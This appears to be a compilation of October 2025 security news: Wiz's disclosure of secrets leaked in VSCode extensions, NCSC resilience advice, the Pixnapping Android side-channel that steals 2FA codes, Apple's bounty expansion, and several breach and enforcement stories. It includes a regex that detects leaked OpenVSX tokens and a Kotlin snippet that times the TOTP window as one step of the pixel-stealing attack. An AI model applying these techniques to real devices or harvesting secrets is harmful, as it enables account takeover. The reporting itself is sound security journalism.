Expiration: defaulting to a reasonable secret lifetime decreases the exploitation window for leaked secrets. In this research, for example, we observed a significant volume of VSCode PATs leaked in 2023 that had expired automatically. In several cases, Open VSX PATs were leaked in the same location but were still valid. This demonstrates the benefit of expiration.

Identifiable structure: GitHub and Microsoft have long been advocates of structuring secrets for easier identification and protection. Identifiable prefixes, checksums, or the full Common Annotated Security Key (CASK) standard all offer an advantage to defenders. Our results will over-represent well-structured secrets, but remaining risks post-disclosure will predominantly be secrets that lack easily detectable structure.
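
For illustration, here is a small sketch of the kind of scanner rule that identifiable structure enables; the ovsxp_ prefix is the one OpenVSX announced above, while the token length and character set in the pattern are assumptions.

import re

# Prefixed tokens can be matched with very low false-positive rates.
# ovsxp_ is OpenVSX's announced prefix; the length and charset below are assumed.
OVSX_TOKEN = re.compile(r"\bovsxp_[A-Za-z0-9_-]{20,}\b")

sample = "OVSX_PAT = 'ovsxp_" + "a" * 32 + "'  # leaked in a bundled .env"
print(OVSX_TOKEN.findall(sample))   # prints the matched token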

GitHub Advanced Secret Scanning: Platforms should strongly consider enrolling in the Secret Scanning Partner Program. As shown in our past research, GitHub can be home to a large volume of secrets. In this project, we saw that a number of secrets leaked in VSCode extensions were also leaked on GitHub. For secrets supported by Advanced Secret Scanning, that meant publishers had already been notified of the risk automatically.

Takeaways & Timeline
We are relieved to have found, responsibly disclosed, and helped comprehensively resolve this risk.

The issue highlights the continued risks of extensions and plugins, and supply chain security in general. It continues to validate the impression that any package repository carries a high risk of mass secrets leakage. It also reflects our findings that AI secrets are a large part of the modern secrets leakage landscape, and indicates the role vibe coding might play in that problem.

Finally, our work with Microsoft highlights the role that responsible platforms can play in protecting the ecosystem. We are grateful to Microsoft for the partnership and working to protect customers together. Without their willingness to lean in here, it would have been impossible to scale disclosure and remediation.

For more documentation on VSCode Extension security, please visit:

Extension runtime security

Publishing Extensions

Walkthrough: Publish a Visual Studio extension

Timeline
March 30th, 2025: Wiz Research reports this issue to MSRC.

April 4th, 2025: Wiz reports initial batch of 250 leaked secrets.

April 25th, 2025: MSRC completes notification of impacted third-parties who had leaked reported secrets.

May 1st, 2025: MSRC marks the report Ineligible for Bounty, and closes the case as Complete.

May 2nd, 2025: Wiz notes potential negative impact of disclosure without additional controls in place, and requests information on platform level improvements.

May 13th, 2025: MSRC re-opens the case, and starts “working on a plan and a timeline for preventative measures”.

June 11th, 2025: Microsoft publishes Security and Trust in Visual Studio Marketplace.

July 10th, 2025: MSRC shares plans for remediation, and requests a late-September disclosure timeline.

Aug 12th, 2025: MSRC and Wiz Research meet, and expand on remediation plans. Wiz identifies and highlights VSCode Marketplace PAT detection gap in secrets scanning. VSCode Marketplace team announces Secret Detection for Extensions.

Aug 27th, 2025: MSRC sets September 25th as the disclosure date.

Sep 18th, 2025: MSRC requests a delay in disclosure due to a performance issue in an implemented hardening measure.

Sep 23rd, 2025: MSRC suggests October 15, 2025 disclosure date.

Have plans on paper in case of cyber-attack, firms told

bbc.com
Joe Tidy, Cyber correspondent, BBC World Service

Prepare to switch to offline systems in the event of a cyber-attack, firms are being advised.

People should plan for potential cyber-attacks by going back to pen and paper, according to the latest advice.

The government has written to chief executives across the country strongly recommending that they should have physical copies of their plans at the ready as a precaution.

A recent spate of hacks has highlighted the chaos that can ensue when hackers take computer systems down.

The warning comes as the National Cyber-Security Centre (NCSC) reported an increase in nationally significant attacks this year.

Criminal hacks on Marks and Spencer, The Co-op and Jaguar Land Rover have led to empty shelves and production lines being halted this year as the companies struggled without their computer systems.

Organisations need to "have a plan for how they would continue to operate without their IT, (and rebuild that IT at pace), were an attack to get through," said Richard Horne, chief executive of the NCSC.

Firms are being urged to look beyond cyber-security controls toward a strategy known as "resilience engineering", which focuses on building systems that can anticipate, absorb, recover, and adapt, in the event of an attack.

Plans should be stored in paper form or offline, the agency suggests, and should include information about how teams will communicate without work email, along with other analogue workarounds.

These types of cyber attack contingency plans are not new but it's notable that the UK's cyber authority is putting the advice prominently in its annual review.

Although the total number of hacks that the NCSC dealt with in the first nine months of this year was, at 429, roughly the same as for a similar period last year, there was an increase in hacks with a bigger impact.

The number of "nationally significant" incidents represented nearly half, or 204, of all incidents. Last year only 89 were in that category.

A nationally significant incident covers cyber-attacks in the three highest categories in the NCSC and UK law enforcement categorisation model:

Category 1: National cyber-emergency.
Category 2: Highly significant incident.
Category 3: Significant incident.
Category 4: Substantial incident.
Category 5: Moderate incident.
Category 6: Localised incident.
Amongst this year's incidents, 4% (18) were in the second highest category "highly significant".

This marks a 50% increase in such incidents, and the third consecutive year that the figure has risen.

The NCSC would not give details on which attacks, either public or undisclosed, fall into which category.

But, as a benchmark, it is understood that the wave of attacks on UK retailers in the spring, which affected Marks and Spencer, The Co-op and Harrods, would be classed as a Significant incident.

One of the most serious attacks last year, on a blood testing provider, caused major problems for London hospitals. It resulted in significant clinical disruption and directly contributed to at least one patient death.

The NCSC would not say which category this incident would fall into.

The vast majority of attacks are financially motivated with criminal gangs using ransomware or data extortion to blackmail a victim into sending Bitcoins in ransom.

Whilst most cyber-crime gangs are headquartered in Russia or former Soviet countries, there has been a resurgence in teenage hacking gangs thought to be based in English-speaking countries.

So far this year seven teenagers have been arrested in the UK as part of investigations into major cyber-attacks.

As well as the advice over heightened preparations and collaboration, the government is asking organisations to make better use of the free tools and services offered by the NCSC, for example free cyber-insurance for small businesses that have completed the popular Cyber-Essentials programme.

'Basic protection'
Paul Abbott, whose Northamptonshire transport firm KNP closed after hackers encrypted its operational systems and demanded money in 2023, says it's no longer a case of "if" such incidents will happen, but when.

"We were throwing £120,000 a year at [cyber-security] with insurance and systems and third-party managed systems," Mr Abbott told BBC Radio 5 Live on Tuesday.

He said he now focuses on security, education and contingency - key to which involves planning what is needed to keep a business running in the event of an attack or outage.

"The call for pen and paper might sound old-fashioned, but it's practical," said Graeme Stewart, head of public sector at cyber-security firm Check Point, noting digital systems can be rendered "useless" once targeted by hackers.

"You wouldn't walk onto a building site without a helmet - yet companies still go online without basic protection," he added.

"Cybersecurity needs to be treated with the same seriousness as health and safety: not optional, not an afterthought, but part of everyday working life."

Hackers can steal 2FA codes and private messages from Android phones
Ars Technica
Dan Goodin, Senior Security Editor
October 13, 2025

The malicious app required to make the “Pixnapping” attack work needs no permissions.

Android devices are vulnerable to a new attack that can covertly steal two-factor authentication codes, location timelines, and other private data in less than 30 seconds.

The new attack, named Pixnapping by the team of academic researchers who devised it, requires a victim to first install a malicious app on an Android phone or tablet. The app, which requires no system permissions, can then effectively read data that any other installed app displays on the screen. Pixnapping has been demonstrated on Google Pixel phones and the Samsung Galaxy S25 phone and likely could be modified to work on other models with additional work. Google released mitigations last month, but the researchers said a modified version of the attack works even when the update is installed.

Like taking a screenshot
Pixnapping attacks begin with the malicious app invoking Android programming interfaces that cause the authenticator or other targeted apps to send sensitive information to the device screen. The malicious app then runs graphical operations on individual pixels of interest to the attacker. Pixnapping then exploits a side channel that allows the malicious app to map the pixels at those coordinates to letters, numbers, or shapes.

“Anything that is visible when the target app is opened can be stolen by the malicious app using Pixnapping,” the researchers wrote on an informational website. “Chat messages, 2FA codes, email messages, etc. are all vulnerable since they are visible. If an app has secret information that is not visible (e.g., it has a secret key that is stored but never shown on the screen), that information cannot be stolen by Pixnapping.”

The new attack class is reminiscent of GPU.zip, a 2023 attack that allowed malicious websites to read the usernames, passwords, and other sensitive visual data displayed by other websites. It worked by exploiting side channels found in GPUs from all major suppliers. The vulnerabilities that GPU.zip exploited have never been fixed. Instead, the attack was blocked in browsers by limiting their ability to open iframes, an HTML element that allows one website (in the case of GPU.zip, a malicious one) to embed the contents of a site from a different domain.

Pixnapping targets the same side channel as GPU.zip, specifically the precise amount of time it takes for a given frame to be rendered on the screen.

“This allows a malicious app to steal sensitive information displayed by other apps or arbitrary websites, pixel by pixel,” Alan Linghao Wang, lead author of the research paper “Pixnapping: Bringing Pixel Stealing out of the Stone Age,” explained in an interview. “Conceptually, it is as if the malicious app was taking a screenshot of screen contents it should not have access to. Our end-to-end attacks simply measure the rendering time per frame of the graphical operations… to determine whether the pixel was white or non-white.”

Pixnapping in three steps
The attack occurs in three main steps. In the first, the malicious app invokes Android APIs that make calls to the app the attacker wants to snoop on. These calls can also be used to effectively scan an infected device for installed apps of interest. The calls can further cause the targeted app to display specific data it has access to, such as a message thread in a messaging app or a 2FA code for a specific site. This call causes the information to be sent to the Android rendering pipeline, the system that takes each app’s pixels so they can be rendered on the screen. The Android-specific calls made include activities, intents, and tasks.

In the second step, Pixnapping performs graphical operations on individual pixels that the targeted app sent to the rendering pipeline. These operations choose the coordinates of target pixels the app wants to steal and begin to check if the color of those coordinates is white or non-white or, more generally, if the color is c or non-c (for an arbitrary color c).

“Suppose, for example, [the attacker] wants to steal a pixel that is part of the screen region where a 2FA character is known to be rendered by Google Authenticator,” Wang said. “This pixel is either white (if nothing was rendered there) or non-white (if part of a 2FA digit was rendered there). Then, conceptually, the attacker wants to cause some graphical operations whose rendering time is long if the target victim pixel is non-white and short if it is white. The malicious app does this by opening some malicious activities (i.e., windows) in front of the victim app that was opened in Step 1.”

The third step measures the amount of time required at each coordinate. By combining the times for each one, the attack can rebuild the images sent to the rendering pipeline one pixel at a time.

As Ars reader hotball put it in the comments below:

Basically the attacker renders something transparent in front of the target app, then using a timing attack exploiting the GPU’s graphical data compression to try finding out the color of the pixels. It’s not something as simple as “give me the pixels of another app showing on the screen right now.” That’s why it takes time and can be too slow to fit within the 30 seconds window of the Google Authenticator app.

In an online interview, paper co-author Ricardo Paccagnella described the attack in more detail:

Step 1: The malicious app invokes a target app to cause some sensitive visual content to be rendered.

Step 2: The malicious app uses Android APIs to “draw over” that visual content and cause a side channel (in our case, GPU.zip) to leak as a function of the color of individual pixels rendered in Step 1 (e.g., activate only if the pixel color is c).

Step 3: The malicious app monitors the side effects of Step 2 to infer, e.g., if the color of those pixels was c or not, one pixel at a time.

Steps 2 and 3 can be implemented differently depending on the side channel that the attacker wants to exploit. In our instantiations on Google and Samsung phones, we exploited the GPU.zip side channel. When using GPU.zip, measuring the rendering time per frame was sufficient to determine if the color of each pixel is c or not. Future instantiations of the attack may use other side channels where controlling memory management and accessing fine-grained timers may be necessary (see Section 3.3 of the paper). Pixnapping would still work then: the attacker would just need to change how Steps 2 and 3 are implemented.

The amount of time required to perform the attack depends on several variables, including how many coordinates need to be measured. In some cases, there’s no hard deadline for obtaining the information the attacker wants to steal. In other cases—such as stealing a 2FA code—every second counts, since each one is valid for only 30 seconds. In the paper, the researchers explained:

To meet the strict 30-second deadline for the attack, we also reduce the number of samples per target pixel to 16 (compared to the 34 or 64 used in earlier attacks) and decrease the idle time between pixel leaks from 1.5 seconds to 70 milliseconds. To ensure that the attacker has the full 30 seconds to leak the 2FA code, our implementation waits for the beginning of a new 30-second global time interval, determined using the system clock.

… We use our end-to-end attack to leak 100 different 2FA codes from Google Authenticator on each of our Google Pixel phones. Our attack correctly recovers the full 6-digit 2FA code in 73%, 53%, 29%, and 53% of the trials on the Pixel 6, 7, 8, and 9, respectively. The average time to recover each 2FA code is 14.3, 25.8, 24.9, and 25.3 seconds for the Pixel 6, Pixel 7, Pixel 8, and Pixel 9, respectively. We are unable to leak 2FA codes within 30 seconds using our implementation on the Samsung Galaxy S25 device due to significant noise. We leave further investigation of how to tune our attack to work on this device to future work.
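
The "waits for the beginning of a new 30-second global time interval" step is simple clock arithmetic, since TOTP codes roll over at fixed 30-second boundaries of the Unix epoch. A minimal Kotlin sketch of that wait, assuming the standard TOTP period:

// Minimal sketch: milliseconds until the next 30-second TOTP boundary,
// assuming the standard period aligned to the Unix epoch.
const val TOTP_PERIOD_MS = 30_000L

fun msUntilNextTotpWindow(nowMs: Long = System.currentTimeMillis()): Long =
    TOTP_PERIOD_MS - (nowMs % TOTP_PERIOD_MS)

fun main() {
    // Sleep until a new code window opens, leaving the full 30 s for the pixel leak.
    Thread.sleep(msUntilNextTotpWindow())
    println("New 2FA window started; begin leaking pixels now.")
}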

In an email, a Google representative wrote, “We issued a patch for CVE-2025-48561 in the September Android security bulletin, which partially mitigates this behavior. We are issuing an additional patch for this vulnerability in the December Android security bulletin. We have not seen any evidence of in-the-wild exploitation.”

Pixnapping is useful research in that it demonstrates the limitations of Google’s security and privacy assurances that one installed app can’t access data belonging to another app. The challenges in implementing the attack to steal useful data in real-world scenarios, however, are likely to be significant. In an age when teenagers can steal secrets from Fortune 500 companies simply by asking nicely, more complicated and limited attacks are probably of less value.

A major evolution of Apple Security Bounty, with the industry's top awards for the most advanced research
  • Apple Security Research - October 10, 2025

Since we launched the public Apple Security Bounty program in 2020, we’re proud to have awarded over $35 million to more than 800 security researchers, with multiple individual reports earning $500,000 rewards. We’re grateful to everyone who submitted their research and worked closely with us to help protect our users.

Today we’re announcing the next major chapter for Apple Security Bounty, featuring the industry’s highest rewards, expanded research categories, and a flag system for researchers to objectively demonstrate vulnerabilities and obtain accelerated awards.

We’re doubling our top award to $2 million for exploit chains that can achieve similar goals as sophisticated mercenary spyware attacks. This is an unprecedented amount in the industry and the largest payout offered by any bounty program we’re aware of — and our bonus system, providing additional rewards for Lockdown Mode bypasses and vulnerabilities discovered in beta software, can more than double this reward, with a maximum payout in excess of $5 million. We’re also doubling or significantly increasing rewards in many other categories to encourage more intensive research. This includes $100,000 for a complete Gatekeeper bypass, and $1 million for broad unauthorized iCloud access, as no successful exploit has been demonstrated to date in either category.

Our bounty categories are expanding to cover even more attack surfaces. Notably, we're rewarding one-click WebKit sandbox escapes with up to $300,000, and wireless proximity exploits over any radio with up to $1 million.

We’re introducing Target Flags, a new way for researchers to objectively demonstrate exploitability for some of our top bounty categories, including remote code execution and Transparency, Consent, and Control (TCC) bypasses — and to help determine eligibility for a specific award. Researchers who submit reports with Target Flags will qualify for accelerated awards, which are processed immediately after the research is received and verified, even before a fix becomes available.

These updates will go into effect in November 2025. At that time, we will publish the complete list of new and expanded categories, rewards, and bonuses on the Apple Security Research site, along with detailed instructions for taking advantage of Target Flags, updated program guidelines, and much more.

Since we introduced our bounty program, we have continued to build industry-leading security defenses in our products, including Lockdown Mode, an upgraded security architecture in the Safari browser, and most recently, Memory Integrity Enforcement. These advances represent a significant evolution in Apple platform security, helping make iPhone the most secure consumer device in the world — and they also make it much more challenging and time-consuming for researchers to develop working exploits for vulnerabilities on our platforms.

Meanwhile, the only system-level iOS attacks we observe in the wild come from mercenary spyware — extremely sophisticated exploit chains, historically associated with state actors, that cost millions of dollars to develop and are used against a very small number of targeted individuals. While Lockdown Mode and Memory Integrity Enforcement make such attacks drastically more expensive and difficult to develop, we recognize that the most advanced adversaries will continue to evolve their techniques.

As a result, we’re adapting Apple Security Bounty to encourage highly advanced research on our most critical attack surfaces despite the increased difficulty, and to provide insights that support our mission to protect users of over 2.35 billion active Apple devices worldwide. Our updated program offers outsize rewards for findings that help us stay ahead of real-world threats, significantly prioritizing verifiable exploits over theoretical vulnerabilities, and partial and complete exploit chains over individual exploits.

Greater rewards for complete exploit chains
Mercenary spyware attacks typically chain many vulnerabilities together, cross different security boundaries, and incrementally escalate privileges. Apple’s Security Engineering and Architecture (SEAR) team focuses its offensive research on understanding such exploitation paths to drive foundational improvements to the strength of our defenses, and we want Apple Security Bounty to encourage new perspectives and ideas from the security research community. Here is a preview of how we're increasing rewards for five key attack vectors:

Attack vector (current maximum → new maximum):

Zero-click chain: remote attack with no user interaction ($1M → $2M)
One-click chain: remote attack with one-click user interaction ($250K → $1M)
Wireless proximity attack: attack requiring physical proximity to the device ($250K → $1M)
Physical device access: attack requiring physical access to a locked device ($250K → $500K)
App sandbox escape: attack from the app sandbox to SPTM bypass ($150K → $500K)

Top rewards are for exploits that are similar to the most sophisticated, real-world threats, that work on our latest hardware and software, and that use our new Target Flags, which we explain in more detail below. The rewards are determined by the demonstrated outcome, regardless of the specific route through the system. This means that rewards for remote-entry vectors are significantly increasing, and rewards for attack vectors not commonly observed in real-world attacks are decreasing. Individual chain components or multiple components that cannot be linked together will remain eligible for rewards, though these are proportionally smaller to match their relative impact.

Boosting macOS Gatekeeper
Because macOS allows users to install applications from multiple sources, Gatekeeper is our first and most important line of defense against malicious software. Although Gatekeeper has been included in Apple Security Bounty since 2020, we've never received a report demonstrating a complete Gatekeeper bypass with no user interaction. To drive deeper research in this critical area, researchers who report a full Gatekeeper bypass with no user interaction are eligible for a $100,000 award.

Expanded Apple Security Bounty categories
One-click attacks through the web browser remain a critical entry vector for mercenary spyware on all major operating systems, including iOS, Android, and Windows. Our core defense against these threats is deeply robust isolation of WebKit’s WebContent process, and our focused engineering improvements over the past few years — including the GPU Process security architecture and our comprehensive CoreIPC hardening — have eliminated WebContent’s direct access to thousands of external IPC endpoints and removed 100 percent of the IOUserClient attack surface from the WebContent sandbox.

As a result, researchers who demonstrate chaining WebContent code execution with a sandbox escape can receive up to $300,000, and continuing the chain to achieve unsigned code execution with arbitrary entitlements becomes eligible for a $1 million reward. Modern browser renderers are exceptionally complex, which is why rigorous process isolation is so central to our WebKit security strategy. Therefore, WebContent exploits that are not able to break process isolation and escape the sandbox will receive smaller rewards.

We're also expanding our Wireless Proximity category, which includes our latest devices with the Apple-designed C1 and C1X modems and N1 wireless chip. We believe the architectural improvements and enhanced security in these devices make them the most secure in the industry, making proximity-based attacks more challenging to execute than ever. While we've never observed a real-world, zero-click attack executed purely through wireless proximity, we're committed to protecting our users against even the most sophisticated threats. We are therefore expanding our wireless proximity bounty to encompass all radio interfaces in our latest devices, and we are doubling the maximum reward for this category to $1 million.

Introducing Target Flags
In addition to increasing reward amounts and expanding bounty categories, we're making it easier for researchers to objectively demonstrate their findings — and to determine the expected reward for their specific research report. Target Flags, inspired by capture-the-flag competitions, are built into our operating systems and allow us to rapidly review the issue and process a resulting reward, even before we release a fix.

When researchers demonstrate security issues using Target Flags, the specific flag that’s captured objectively demonstrates a given level of capability — for example, register control, arbitrary read/write, or code execution — and directly correlates to the reward amount, making the award determination more transparent than ever. Because Target Flags can be programmatically verified by Apple as part of submitted findings, researchers who submit eligible reports with Target Flags will receive notification of their bounty award immediately upon our validation of the captured flag. Confirmed rewards will be issued in an upcoming payment cycle rather than when a fix becomes available, underscoring the trust we've built with our core researcher community.

Target Flags are supported on all Apple platforms — iOS, iPadOS, macOS, visionOS, watchOS, and tvOS — and cover a number of Apple Security Bounty areas, and coverage will expand over time.

Reward and bonus guidelines
Top rewards in all categories apply only for issues affecting the latest publicly available software and hardware. Our newest devices and operating systems incorporate our most advanced security features, such as Memory Integrity Enforcement in the iPhone 17 lineup, making research against current hardware significantly more valuable for our defensive efforts.

We continue to offer bonus rewards for exceptional research. Reports on issues in current developer or public beta releases qualify for substantial bonuses, as they give us a chance to fix the problem before the software is ever released to our users. And we continue to award significant bonuses for exploit chain components that bypass specific Lockdown Mode protections.

Finally, each year we receive a number of issues outside of Apple Security Bounty categories which we assess to be of low impact to real-world user security, but which we nonetheless address with software fixes out of an abundance of caution. Oftentimes, these issues are some of the first reports we receive from researchers new to our platforms. We want those researchers to have an encouraging experience, so in addition to CVE assignment and researcher credit as before, we will now also reward such reports with a $1,000 award. We have been piloting these awards for some time and are pleased to make them a permanent part of our expanded reward portfolio.

Special initiatives for 2026
In 2022, we made an unprecedented $10 million cybersecurity grant in support of civil society organizations that investigate highly targeted mercenary spyware attacks. Now, we are planning a special initiative featuring iPhone 17 with Memory Integrity Enforcement, which we believe is the most significant upgrade to memory safety in the history of consumer operating systems. To rapidly make this revolutionary, industry-leading defense available to members of civil society who may be targeted by mercenary spyware, we will provide a thousand iPhone 17 devices to civil society organizations who can get them into the hands of at-risk users. This initiative reflects our continued commitment to make our most advanced security protections reach those who need them most.

Additionally, the 2026 Security Research Device Program now includes iPhone 17 devices with our latest security advances, including Memory Integrity Enforcement, and is available to applicants with proven security research track records on any platform. Researchers seeking to accelerate their iOS research can apply for the 2026 program by October 31, 2025. All vulnerabilities discovered using the Security Research Device receive priority consideration for Apple Security Bounty rewards and bonuses.

In closing
We’re updating Apple Security Bounty to encourage researchers to examine the most critical attack surfaces on our platforms and services, and to help drive the highest impact security discoveries. As we continue to raise our research standards, we are also dramatically increasing rewards — our highest award will be $2 million before bonus considerations.

Until the updated awards are published online, we will evaluate all new reports against our previous framework as well as the new one, and we'll award the higher amount. And while we’re especially motivated to receive complex exploit chains and innovative research, we’ll continue to review and reward all reports that significantly impact the security of our users, even if they're not covered by our published categories. We look forward to continuing to work with you to help keep our users safe!

Microsoft violated EU law in handling of kids’ data, Austrian privacy regulator finds | The Record from Recorded Future News

therecord.media Suzanne Smalley
October 10th, 2025

Austria's data protection authority on Wednesday ruled that Microsoft illegally tracked students using its education software by failing to give them access to their data and using cookies without consent.

The decision from Austria’s Datenschutzbehörde (DSB) came in response to a 2024 complaint lodged by the Austrian privacy advocacy group noyb, which accused the tech giant of violating Europe’s General Data Protection Regulation (GDPR) in its handling of children’s data.

The complainant in the case, the father of a minor whose school uses the software, said he did not consent to the cookies and could not get information about how his child’s data was being used.

Microsoft 365 Education is used by school districts to manage technology, allow collaboration and store data in the cloud. It includes Office applications like Word, Excel, Outlook and PowerPoint as well as security tools and collaboration platforms like Teams.

"The decision highlights the lack of transparency in Microsoft 365 Education," Felix Mikolasch, a data protection lawyer at Noyb, said Friday in a prepared statement. "It is nearly impossible for schools to inform students, parents and teachers about what is happening with their data."

A spokesperson for Microsoft said in a prepared statement that the company will review the decision.

“Microsoft 365 for Education meets all required data protection standards and institutions in the education sector can continue to use it in compliance with GDPR,” the statement said.

The regulator has ordered Microsoft to give the complainant access to their data and to explain more clearly how it uses the data it collects.

Minister of Economic Affairs invokes Goods Availability Act | News item | Government.nl

government.nl

On Tuesday, 30 September 2025, the Dutch Minister of Economic Affairs invoked the Goods Availability Act (Wet beschikbaarheid goederen) due to serious governance shortcomings at semiconductor manufacturer Nexperia. The company’s headquarters are located in Nijmegen, with additional subsidiaries in various countries around the world. The decision aims to prevent a situation in which the goods produced by Nexperia (finished and semi-finished products) would become unavailable in an emergency. The company’s regular production process can continue.

Reason for intervention under the Goods Availability Act
The Act has been invoked following recent and acute signals of serious governance shortcomings and actions within Nexperia. These signals posed a threat to the continuity and safeguarding on Dutch and European soil of crucial technological knowledge and capabilities. Losing these capabilities could pose a risk to Dutch and European economic security. Nexperia produces, among other things, chips used in the European automotive industry and in consumer electronics.

This measure is intended to mitigate that risk. On the basis of the order, company decisions may be blocked or reversed by the Minister of Economic Affairs if they are (potentially) harmful to the interests of the company, to its future as a Dutch and European enterprise, and/or to the preservation of this critical value chain for Europe. The company’s regular production process can continue.

It is highly exceptional for the Minister to invoke the Goods Availability Act. The decision to apply the Act was made only because of the significant scale and urgency of the governance deficiencies at Nexperia. This is a measure the government uses only when absolutely necessary. The application of the Act in this case is solely intended to prevent governance shortcomings at the specific company concerned and is not directed at other companies, the sector, or other countries. Parties may lodge an objection to this decision before the courts.

Spain dismantles “GXC Team” cybercrime syndicate, arrests leader

bleepingcomputer.com
By Bill Toulas
October 11, 2025

Spain's Guardia Civil has dismantled the “GXC Team” cybercrime operation and arrested its alleged leader, a 25-year-old Brazilian known as “GoogleXcoder.”

The GXC Team operated a crime-as-a-service (CaaS) platform offering AI-powered phishing kits, Android malware, and voice-scam tools via Telegram and a Russian-speaking hacker forum.

“The Civil Guard has dismantled one of the most active criminal organizations in the field of phishing in Spain, with the arrest of a 25-year-old Brazilian young man considered the main provider of tools for the massive theft of credentials in the Spanish-speaking environment,” announced Guardia Civil.

Group-IB has been tracking the operation and says that GXC Team was targeting banks, transport, and e-commerce entities in Spain, Slovakia, the UK, the US, and Brazil.

The phishing kits replicated the websites of dozens of Spanish and international institutions and powered at least 250 phishing sites.

The threat group also developed at least nine Android malware strains that intercepted SMS and one-time passwords (OTPs), useful for hijacking accounts and validating fraudulent transactions.

GXC Team also offered its clients full technical support and campaign customization services, operating as a professional-grade, high-yield crime platform.

A police operation conducted on May 20 involved coordinated raids across Cantabria, Valladolid, Zaragoza, Barcelona, Palma de Mallorca, San Fernando, and La Línea de la Concepción.

During these actions, the authorities seized electronic devices containing phishing kit source code, communications with clients, and financial records.

Law enforcement agents recovered cryptocurrency stolen from victims and shut down Telegram channels used to promote the scams. One of these channels was named “Steal everything from grandmothers.”

The authorities stated that the nationwide raids were made possible thanks to the analysis of the seized devices and cryptocurrency transactions of GoogleXcoder, who was arrested more than a year ago.

“The forensic analysis of the seized devices, as well as the cryptocurrency transactions, which lasted for more than a year due to their complexity, made it possible to reconstruct the entire criminal network, managing to identify six people directly related to the use of these services,” explained Guardia Civil.

The investigation into the GXC Team is still ongoing, and Spanish authorities have mentioned the possibility of further actions leading to the arrest of more members of the cybercrime ring.

Qantas says customer data released by cyber criminals months after cyber breach

By Reuters
October 12, 2025, 8:23 AM GMT+2 (updated October 12, 2025)

SYDNEY, Oct 12 (Reuters) - Australia's Qantas Airways said on Sunday that it was one of the companies whose customer data had been published by cybercriminals, after the data was stolen in a July breach of a database containing the personal information of the airline's customers.

The airline said in July that more than a million customers had sensitive details such as phone numbers, birth dates or home addresses accessed in one of Australia's biggest cyber breaches in years. Another four million customers had just their names and email addresses taken during the hack, it said at the time.

The July breach represented Australia's most high-profile cyberattack since telecommunications giant Optus and health insurer Medibank were hit in 2022, incidents that prompted mandatory cyber resilience laws.

On Sunday, Qantas said in a statement that it was "one of a number of companies globally that has had data released by cyber criminals following the airline’s cyber incident in early July, where customer data was stolen via a third party platform".

"With the help of specialist cyber security experts, we are investigating what data was part of the release," it said.

"We have an ongoing injunction in place to prevent the stolen data being accessed, viewed, released, used, transmitted or published by anyone, including third parties," the airline added.

Hacker collective Scattered Lapsus$ Hunters is behind the Qantas data release, which occurred after a ransom deadline set by the group passed, the Guardian Australia news site reported.

Qantas declined to comment on the report.